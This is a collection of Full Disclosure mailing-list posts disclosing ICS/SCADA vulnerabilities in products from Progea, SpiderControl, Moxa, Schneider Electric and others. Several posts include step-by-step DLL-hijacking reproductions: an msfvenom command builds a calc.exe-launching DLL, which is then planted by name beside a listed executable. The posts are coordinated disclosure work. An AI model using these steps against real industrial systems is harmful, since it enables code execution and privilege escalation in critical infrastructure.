[FD] [ICS] Progea Movicon SCADA/HMI Vulnerabilities

[Karn Ganeshen]

Vendor: Progea
Equipment: Movicon SCADA/HMI
Vulnerability: Uncontrolled Search Path Element, Unquoted Search Path or
Element

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-progea-movicon-scadahmi-vulnerabilities/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-290-01

CVE-ID
CVE-2017-14017
CVE-2017-14019


AFFECTED PRODUCTS

The following versions of Movicon HMI, an HMI software platform, are
affected:
Movicon Version 11.5.1181 and prior.


BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Food and
Agriculture, Transportation Systems, Water and Wastewater Systems
Countries/Areas Deployed: Europe, India, and United States
Company Headquarters Location: Italy



IMPACT

Successful exploitation of these vulnerabilities could allow privilege
escalation or arbitrary code execution.



VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may allow a remote attacker without privileges to execute arbitrary
code in the form of a malicious DLL file.

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Movicon SCADA/HMI. User interaction is required
to exploit this vulnerability in that the malicious dll file should be
saved in any of the DLL search paths.

The specific flaw exists within the handling of a specific named DLL file
used by Movicon SCADA/HMI. By placing specific DLL file (listed below), an
attacker is able to force the process to load an arbitrary DLL. This allows
an attacker to execute arbitrary code in the context of the process.


DLL File Name (1)

api-ms-win-appmodel-runtime-l1-1-0.dll


Application Executables (that look for missing DLL)

Movicon.exe
MoviconRunTime.exe
MoviconService.exe
AlarmsImpExp.exe
ReportViewerNET.exe


Steps to reproduce


1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o
api-ms-win-appmodel-runtime-l1-1-0.dll

2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\Program Files\Progea\Movicon11.5\

3. Run MoviconService.exe (or any of the above listed executables), and Exit


CVE-2017-14017 has been assigned to this vulnerability. A CVSS v3 base
score of 6.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).


UNQUOTED SEARCH PATH OR ELEMENT CWE-428
An unquoted search path or element vulnerability has been identified, which
may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate his or her privileges.

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user’s code would execute with
the elevated privileges of the application.

• MOVICON (MOVICON) runs as LocalSystem and has path: C:\Program
Files\Progea\Movicon11.5\MoviconService.exe:

CVE-2017-14019 has been assigned to this vulnerability. A CVSS v3 base
score of 6.5 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).

+

Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] SpiderControl SCADA Web Server Improper Privilege Management Vulnerability

[Karn Ganeshen]

Vendor: SpiderControl
Equipment: SCADA Web Server
Vulnerability: Improper Privilege Management

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-spidercontrol-scada-web-server-improper-privilege-management-vulnerability/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-250-01

CVE-ID
CVE-2017-12728


AFFECTED PRODUCTS


The following versions of SCADA Web Server, a software management platform,
are affected:
SCADA Web Server Version 2.02.0007 and prior.


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could allow authenticated
system users to escalate their privileges under certain conditions.


VULNERABILITY OVERVIEW


IMPROPER PRIVILEGE MANAGEMENT CWE-269

Authenticated, non-administrative local users are able to alter service
executables with escalated privileges which could allow an attacker to
execute arbitrary code under the context of the current system services.

CVE-2017-12728 has been assigned to this vulnerability. A CVSS v3 base
score of 5.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).



Vulnerability Details


1. Untrusted Users Can Modify Windows Service Executables
It is possible for non-administrative local users to replace some of the
Windows Service executables with malicious programs. This could be abused
to execute programs with the privileges of the Windows services concerned.

The programs below have FILE_WRITE, WRITE_DAC or WRITE_OWNER permission
granted to non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_WRITE_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_WRITE_DATA

2. Delete Permission Granted On Windows Service Executables
It is possible for non-administrative local users to delete some of the
Windows Service executables with malicious programs. This could lead to
disruption or denial of service.

The programs below have DELETE permission granted to non-administrative
users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: DELETE
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
DELETE

3. Append Permission Granted Windows Service Executables
It is possible for non-administrative local users to append to some of the
Windows Service executables with malicious programs. This is unlikely to be
exploitable for .exe files, but is it bad security practise to allow more
access than necessary to low-privileged users.

The programs below have FILE_APPEND permission granted to
non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_APPEND_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_APPEND_DATA


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] JanTek JTC-200 Vulnerabilities

[Karn Ganeshen]

Vendor: JanTek
Equipment: JTC-200
Vulnerabilities: Cross-site Request Forgery, Improper Authentication

Advisory URL:
https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02

CVE-ID
CVE-2016-5789
CVE-2016-5791

Detailed Proof of Concept:
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/


AFFECTED PRODUCTS


The following versions of JTC-200, a TCP/IP converter, are affected:
JTC-200 all versions.


BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Europe and Asia
Company Headquarters Location: Taiwan



IMPACT

Successful exploitation of these vulnerabilities allow for remote code
execution on the device with elevated privileges.


VULNERABILITY OVERVIEW


CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
An attacker could perform actions with the same permissions as a victim
user, provided the victim has an active session and is induced to trigger
the malicious request.

CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score
of 8.0 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

IMPROPER AUTHENTICATION CWE-287
The improper authentication could provide undocumented Busybox Linux shell
accessible over Telnet service without any authentication.

CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score
of 9.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).


Technical Details

https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/

+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] AzeoTech DAQFactory – Insecure Default Permissions and Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: AzeoTech
Equipment: DAQFactory
Vulnerability: Incorrect Default Permissions, Uncontrolled Search Path
Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-azeotech-
daqfactory-insecure-default-permissions-insecure-library-
loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-01

CVE-IDs
CVE-2017-12699
CVE-2017-5147


AFFECTED PRODUCTS

The following versions are affected:

DAQFactory versions prior to 17.1


BACKGROUND

Critical Infrastructure Sectors: Critical manufacturing, Energy, and Water
Countries/Areas Deployed: United States and Europe
Company Headquarters Location: United States


IMPACT

Successful exploitation of these vulnerabilities could allow authenticated
local users to escalate their privileges and execute arbitrary code.



VULNERABILITY OVERVIEW


A)​
INCORRECT DEFAULT PERMISSIONS CWE-276
Local, non-administrative users may be able to replace or modify original
application files with malicious ones.

CVE-2017-12699 has been assigned to this vulnerability. A CVSS v3 base
score of 7.1 has been calculated; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

EVERYONE has FULL permissions over all the install files (*exe, *dll),
therefore, it is possible for any local, non-admin user to replace/modify
original application files with malicious ones, and gain privileged access
once an administrative user runs the application. Other vectors are
possible as well.


​B) ​
UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

CVE-2017-5147 has been assigned to this vulnerability. A CVSS v3 base score
of 4.2 has been calculated; the CVSS vector string is
(AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L).

By default, the application (vulnerable versions) is installed in
C:\DAQFactory\. All Authenticated users have RWX permissions on this
directory.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.


Missing Libraries:

pegrc32a.dll
labjackm.dll
iopc.dll


Application Executables (that look for missing DLL):

DAQFactory.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o pegrc32a.dll

2. Place this dll in install directory (or any directory defined in the
PATH environment variable)
C:\DAQFactory\

3. Run DAQFactory.exe
​ -> calc.exe executes​


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Moxa SoftNVR-IA Live Viewer – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: Moxa
Equipment: SoftNVR-IA Live Viewer
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-moxa-softnvr-ia-live-viewer-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-220-02


AFFECTED PRODUCTS

The following versions of SoftNVR-IA Live Viewer, a video surveillance
software designed for industrial automation systems, are affected:

SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions.


BACKGROUND

Critical Infrastructure Sector(s): Critical Manufacturing, Energy, and
Transportation Systems.
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Taiwan


IMPACT

Successful exploitation of this vulnerability may allow an attacker to
execute code from a malicious DLL on the affected system with the same
privileges as the user running the program.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.

CVE-2017-5170 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).


Missing Libraries

msjet48.dll
msjet47.dll
msjet46.dll
msjet45.dll
msjet44.dll
msjet43.dll
msjet42.dll
msjet41.dll
msjter49.dll
msjter48.dll
msjter47.dll
msjter46.dll
msjter45.dll
msjter44.dll
msjter43.dll
msjter42.dll
msjter41.dll


Application Executables (that look for missing DLL)

SoftNVRIA.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o msjter41.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run SoftNVRIA.exe, and Exit

Note: Few DLLs are loaded when the application starts, while few are loaded
when the application is exited. Thus, code execution can happen at the
start or at exit time of the application run.

+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Schneider Electric Trio TView – vulnerable JRE versions in use

[Karn Ganeshen]

Vendor: Schneider Electric
Equipment: Trio TView
Vulnerabilities: Multiple Vulnerabilities for Java Runtime Environment

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-schneider-electric-trio-tview-vulnerable-jre-versions-use/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02

Schneider Electric Advisory
http://www.schneider-electric.com/en/download/document/SEVD-2017-199-01/

Fixed in TView Version 3.29.0.


AFFECTED PRODUCTS

The following versions of Schneider Electric Trio TView, a management and
diagnostics software, are affected:

Trio TView Software, TBUMPROG-TVIEW, Version 3.27.0 and prior.


BACKGROUND

Critical Infrastructure Sector: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Paris, France


IMPACT

Exploitation of these vulnerabilities may allow a remote attacker to
compromise the Trio TView Management Suite.


VULNERABILITY OVERVIEW


A Java Runtime Environment is provided with TView. The Java Runtime
Environment 1.6.0u27 is reported to have multiple vulnerabilities which may
impact TView Version 3.27.0 and earlier. The breakdown of the
vulnerabilities by CVSS score is as follows:

* 180 vulnerabilities were identified as having a CVSS base score of 7.0-10,
* 161 vulnerabilities were identified as having a CVSS base score of
4.0-6.9, and
* 24 vulnerabilities were identified as having a CVSS base score of 0.0-3.9.

+

Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] SpiderControl SCADA MicroBrowser – Stack Buffer Overflow Vulnerability

[Karn Ganeshen]

Vendor: SpiderControl
Equipment: SCADA MicroBrowser
Vulnerability: Stack-based Buffer Overflow

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-spidercontrol-
scada-microbrowser-stack-buffer-overflow/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-02

ZDI Advisory
http://www.zerodayinitiative.com/advisories/ZDI-17-694/

CVE-ID
CVE-2017-12707


AFFECTED PRODUCTS

The following versions of SCADA MicroBrowser, a software management
platform, are affected:

SCADA MicroBrowser Versions 1.6.30.144 and prior.


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could allow an attacker to
gain access to the system, manipulate system files, and potentially render
the system unavailable.


VULNERABILITY OVERVIEW


STACK-BASED BUFFER OVERFLOW CWE-121
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of SpiderControl SCADA MicroBrowser. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within processing of the StaticHTMLTagsFileName
tag. The issue results from the lack of proper validation of the length of
user-supplied data prior to copying it to a fixed-length stack-based
buffer. An attacker can leverage this vulnerability to execute arbitrary
code under the context of the current process

CVE-2017-12707 has been assigned to this vulnerability. A CVSS v3 base
score of 7.3 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).



+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] SpiderControl SCADA Web Server – Directory Traversal Vulnerability

[Karn Ganeshen]

Vendor: SpiderControl
Equipment: SCADA Web Server
Vulnerability: Directory Traversal

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-spidercontrol-scada-web-server-directory-traversal-vulnerability/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-03

ZDI Advisory
http://www.zerodayinitiative.com/advisories/ZDI-17-695

CVE-ID
CVE-2017-12694


AFFECTED PRODUCTS

The following versions of SpiderControl SCADA Web Server, a software
management platform, are affected:

SCADA Web Server < version 2.02.0100


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could cause an attacker to
gain read access to system files through directory traversal.


VULNERABILITY OVERVIEW


IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (‘PATH
TRAVERSAL’) CWE-22

This vulnerability allows remote attackers to disclose sensitive
information on vulnerable installations of SpiderControl SCADA.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within web server access to the scdefault
directory. The issue results from the lack of proper validation of a
user-supplied path prior to using it in file operations. An attacker can
leverage this vulnerability to disclose files accessible to the SYSTEM
account.

CVE-2017-12694 has been assigned to this vulnerability. A CVSS v3 base
score of 5.3 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).



+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] SIMPlight SCADA software – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: SIMPlight
Equipment: SCADA Software
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-simplight-scada-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-01


AFFECTED PRODUCTS

The following versions of SIMPlight SCADA software, software for building
management systems and automated facilities, are affected:

SCADA Software version 4.3.0.27 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Chemical, Commercial Facilities,
Critical Manufacturing, Defense Industrial Base, Energy, Food and
Agriculture, Government Facilities, Healthcare and Public Health, Nuclear
Reactors, Materials, and Waste
Countries/Areas Deployed: Unknown
Company Headquarters Location: Russia


IMPACT

Successful exploitation of this vulnerability could allow an attacker to
execute arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.

CVE-2017-9661 has been assigned to this vulnerability. A CVSS v3 base score
of 7.0 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

iopc2.dll



Application Executables (that look for missing DLL)

ArchBrowser.exe
Designer.exe
Monitor.exe



Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o iopc2.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run ArchBrowser.exe (or any from listed above) -> calc.exe will execute


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Solar Controls Heating Control Downloader – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: Solar Controls
Equipment: Heating Control Downloader (HCDownloader)
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-solar-controls-heating-control-downloader-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-02


AFFECTED PRODUCTS

The following versions of Solar Controls’ Heating Control Downloader
(HCDownloader) are affected:

HCDownloader, Version 1.0.1.15 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Energy
Countries/Areas Deployed: Unknown
Company Headquarters Location: Czech Republic


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element has been identified, which could allow
an attacker to execute arbitrary code on a target system using a malicious
DLL file.

CVE-2017-9646 has been assigned to this vulnerability. A CVSS v3 base score
of 7.8 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

ftd2xx.dll


Application Executables (that look for missing DLL)

HCDownloader.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o ftd2xx.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run HCDownloader.exe -> calc.exe executes


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Solar Controls WATTConfig M Software – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: Solar Controls
Equipment: WATTConfig M Software
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-solar-controls-wattconfig-m-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03


AFFECTED PRODUCTS

The following versions of Solar Controls’ WATTConfig M Software for Windows
2.5.10 for M SSR/MAX PLCs are affected:

WATTConfig M Software, Version 2.5.10.1 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Energy
Countries/Areas Deployed: Unknown
Company Headquarters Location: Czech Republic


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element has been identified, which could allow
an attacker to execute arbitrary code on a target system using a malicious
DLL file.

CVE-2017-9648 has been assigned to this vulnerability. A CVSS v3 base score
of 7.8 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

ftd2xx.dll


Application Executables (that look for missing DLL)

WattConfigM.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o ftd2xx.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run WattConfigM.exe -> calc.exe executes


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] Schneider Electric Pro-Face WinGP – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: Schneider Electric
Equipment: Pro-Face WinGP
Vulnerability: Uncontrolled Search Path Element (DLL side-loading)

Advisory URL:
https://ipositivesecurity.com/2017/06/28/ics-schneider-electric-pro-face-wingp-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-215-01


AFFECTED PRODUCTS

The following versions of Pro-face GP-Pro EX software, an HMI management
platform, are affected:

GP Pro EX version 4.07.000


BACKGROUND

Critical Infrastructure Sector: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Paris, France


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An attacker is able to force the process to load an arbitrary DLL and
execute arbitrary code in the context of the process.

CVE-2017-9961 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H).


Missing Libraries

i2capi.dll



Application Executables (that look for missing DLL)

Runtime.exe



Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o i2capi.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\Pro-face\WinGP\

3. Run Runtime.exe -> calc.exe
​
executes


+
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Schneider Electric Pro-Face WinGP – Runtime.exe – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

[ICS] Schneider Electric Pro-Face WinGP – Runtime.exe – Insecure Library
Loading Allows Code Execution

Vendor: Schneider Electric
Equipment: Pro-Face WinGP
Vulnerability: Uncontrolled Search Path Element (DLL side-loading)

Advisory URL:
https://ipositivesecurity.com/2017/06/28/ics-schneider-electric-pro-face-wingp-insecure-library-loading-allows-code-execution/



AFFECTED PRODUCTS



Schneider Electric Pro-Face WinGP - Packaged version with GP Pro Server EX
-> current version



ABOUT




WinGP is a runtime engine, and is a component of Schneider Electric
Pro-Face GP Pro-Server EX. Pro-Face GP Pro-Server EX is premier HMI
Development Software that supports Dedicated and Open HMI (PC-based)
solutions.

https://www.proface.com/en/download/trial/gpproex/v40
http://www.pro-face.com/otasuke/download/trial/



VULNERABLE VERSION



Packaged version with GP Pro Server EX -> current version



IMPACT




Successful exploitation of this vulnerability could allow an authenticated
user to escalate his or her privileges.



VULNERABILITY DETAILS




This vulnerability allows attackers to execute arbitrary code on vulnerable
installations of Schneider Electric Pro-Face WinGP software. User
interaction is required to exploit this vulnerability in that the malicious
dll file should be saved in any of the DLL search paths.

The specific flaw exists within the handling of a specific named DLL file
used by Runtime.exe. By default, the program is installed in C:\Pro-Face\
and any authenticated local users have RWX access. By placing a specific
DLL/OCX file (listed below), an attacker is able to force the process to
load an arbitrary DLL. This allows an attacker to execute arbitrary code in
the context of the process when it is run.



DLL File Names



i2capi.dll



Application Executables (that look for missing DLL/OCX)



Runtime.exe



Steps to reproduce




1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o i2capi.dll
2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\Pro-face\WinGP\
3. Run Runtime.exe -> calc.exe executes

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Schneider Electric Interactive Graphical SCADA System Software – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: Schneider Electric
Equipment: Interactive Graphical SCADA System (IGSS) Software
Vulnerability: DLL Hijacking
Advisory URL:
https://ipositivesecurity.com/2017/05/18/ics-schneider-electric-interactive-graphical-scada-system-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-094-01


AFFECTED PRODUCTS

Schneider Electric reports that the vulnerability affects the following
IGSS HMI desktop application:
IGSS Software, Version 12 and previous versions.


IMPACT

An attacker who exploits this vulnerability may be able to remotely execute
arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
The software will execute a malicious file if it is named the same as a
legitimate file and placed in a location that is earlier in the search path.

CVE-2017-6033 has been assigned to this vulnerability. A CVSS v3 base score
of 6.8 has been calculated; the CVSS vector string is
(AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).


Vulnerable Libraries:

msjet48.dll
msjet47.dll
msjet46.dll
msjet45.dll
msjet44.dll
msjet43.dll
msjet42.dll
msjet41.dll
hhctrl.ocx


Application Executables (that look for missing DLL):

igss.exe
igss_dde.exe
IGSSdataServer.exe
genhdm.exe
mre.exe
RsLinxTo7TABSLC.exe
WinBROWSE.exe


Application Executables (that look for missing OCX):

errcode.exe
def.exe
chelm.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o msjet41.dll
2. Place this dll (or any of above listed dlls) in install directory (or
C:\Windows, or any directory defined in the PATH environment variable)
C:\app-folder-RW\
3. Run igss.exe -> calc.exe will execute

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] BLF-Tech LLC VisualView HMI Software – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Vendor: BLF-Tech LLC
Equipment: VisualView HMI Software
Vulnerability: DLL Hijacking
Advisory URL:
https://ipositivesecurity.com/2017/05/18/ics-blf-tech-llc-visualview-hmi-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-115-01


AFFECTED PRODUCTS

The following VisualView HMI versions are affected:

VisualView HMI Version 9.9.14.0 and prior.


IMPACT

An attacker who exploits this vulnerability may be able to remotely execute
arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
The uncontrolled search path element vulnerability has been identified,
which may allow an attacker to run a malicious DLL file within the search
path resulting in execution of arbitrary code.

CVE-2017-6051 has been assigned to this vulnerability. A CVSS v3 base score
of 7.0 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries:

iopc2.dll


Application Executables (that look for missing DLL):

Configure.exe


Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o iopc2.dll
2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\app-folder-RW\
3. Open VisualView from Desktop shortcut icon, or execute Configure.exe
from install directory. -> calc.exe

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Schneider Electric Wonderware InduSoft Web Studio Privilege Escalation

[Karn Ganeshen]

Vendor: Schneider Electric
Equipment: Wonderware InduSoft Web Studio
Vulnerability: Incorrect Default Permissions
Advisory URL:
https://ipositivesecurity.com/2017/05/19/ics-schneider-electric-wonderware-indusoft-web-studio-privilege-escalation/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-138-02


